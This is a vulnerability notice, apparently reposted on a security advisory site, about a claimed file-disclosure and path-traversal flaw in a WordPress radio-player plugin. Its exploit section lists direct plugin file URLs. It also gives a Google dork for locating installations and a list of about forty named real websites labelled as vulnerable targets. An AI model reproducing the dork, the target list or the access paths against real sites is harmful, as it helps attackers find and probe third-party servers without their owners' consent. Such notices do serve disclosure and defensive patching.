WordPress lbg-audio8-html5-radio_ads Plugins 4.9.x File Information Exposure

2019.01.14
gb KingSkrupellos (GB) gb
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-538
Dork: inurl:"/wp-content/plugins/lbg-audio8-html5-radio_ads/"

######################################################################################## # Exploit Title : WordPress lbg-audio8-html5-radio_ads Plugins 4.9.x File Information Exposure # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 14/01/2019 # Vendor Homepage : lambertgroupproductions.com # Software Download Link : codecanyon.net/item/shout-html5-radio-player-with-ads-shoutcast-and-icecast-support-wordpress-plugin/20667135 # Software Price : 21$ # Tested On : Windows and Linux # Category : WebApps # Affected Versions : From 3.0 To 4.9.x # Exploit Risk : High # Google Dorks : inurl:"/wp-content/plugins/lbg-audio8-html5-radio_ads/" # Vulnerability Type : CWE-200 [ Information Exposure ] CWE-538 [ File and Directory Information Exposure ] CWE-22 [ Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') ] ######################################################################################## WordPress Plugin - SHOUT - HTML5 Radio Player With Ads - ShoutCast and IceCast Support ######################################################################################## # Impact : *********** * WordPress lbg-audio8-html5-radio_ads 4.9.x and other versions is prone to an arbitrary file disclosure vulnerability because it fails to properly sanitize user-supplied input. * An attacker can exploit this vulnerability to view local files in the context of the web server process, which may aid in launching further attacks. * An information exposure is the intentional or unintentional disclosure of information to an actor that is not explicitly authorized to have access to that information. * The product stores sensitive information in files or directories that are accessible to actors outside of the intended control sphere. * The software uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the software does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. ######################################################################################## # Exploit : ************* /wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_banner.php /wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_banner.php?page=LBG_AUDIO8_HTML5_SHOUTCAST_Manage_Banners /wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php /wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php?page=LBG_AUDIO8_HTML5_SHOUTCAST_Manage_Categories /wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_player.php /wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_player.php?page=LBG_AUDIO8_HTML5_SHOUTCAST_Manage_Players /wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_playlist_record.php /wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_playlist_record.php?page=LBG_AUDIO8_HTML5_SHOUTCAST_Playlist /wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/banners.php /wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/categories.php /wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/help.php /wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/overview.php /wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/overview.php?page=LBG_AUDIO8_HTML5_SHOUTCAST_Manage_Players /wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/overview.php?page=LBG_AUDIO8_HTML5_SHOUTCAST_Add_New /wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/overview.php?page=LBG_AUDIO8_HTML5_SHOUTCAST_Manage_Categories /wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/overview.php?page=LBG_AUDIO8_HTML5_SHOUTCAST_Manage_Banners /wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/overview.php?page=LBG_AUDIO8_HTML5_SHOUTCAST_Help /wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/players.php /wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/playlist.php /wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/preview.html /wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/settings_form.php ######################################################################################## Video Tutorials => ******************* Installation - youtube.com/watch?v=km5cVH-iH_8 How To Use The Player - youtube.com/watch?v=DVLHNopEpXw Manage The Banners - youtube.com/watch?v=i4CWseyJmLc ######################################################################################## # Example Vulnerable Sites : ************************* [+] radioekklesia.com/radio/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php [+] novorio87fm.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php [+] skatemetalold.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php [+] j-air.com.au/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php [+] mediality.fr/glitter/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php [+] radiouppermurray.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php [+] soberforliferadio.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php [+] radiostudion.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php [+] radiosuper.mobi/wp/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php [+] pamehellas.gr/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php [+] sociedadenewsfm.com.br/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php [+] radiopeniel.net/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php [+] osmiumawards.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php [+] radiomorabeza.cv/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php [+] wwcufm.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php [+] radiopolis.gr/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php [+] radiost.com.br/wp/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php [+] patrola021.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php [+] soleilfmbenin.com/sfm/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php [+] lawtudent.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php [+] imprensamadureira.com.br/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php [+] streaminginternacional.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php [+] bandeando.fm/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php [+] mantenanews.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php [+] radio-varazdin.hr/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php [+] hostpa.com.br/siteum/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php [+] radiocapital.cat/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php [+] xn--aydnrehberi-1zb.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php [+] gokiebox.pe/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php [+] radiotown.fi/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php [+] tendenciafm.cl/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php [+] radio7.co.tz/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php [+] radios.bolivia.bo/backup/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php [+] goldenflash.be/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php [+] nordestefmbrasilia.com.br/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php [+] ucradio.net/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php [+] ellinikos.live/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php [+] princesafm.com.br/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php [+] djgrga-radio.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php [+] nococommunityradio.org/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php [+] diocesedecaxiasdomaranhao.org/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php [+] umakiwefm.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php ######################################################################################## # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ########################################################################################


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top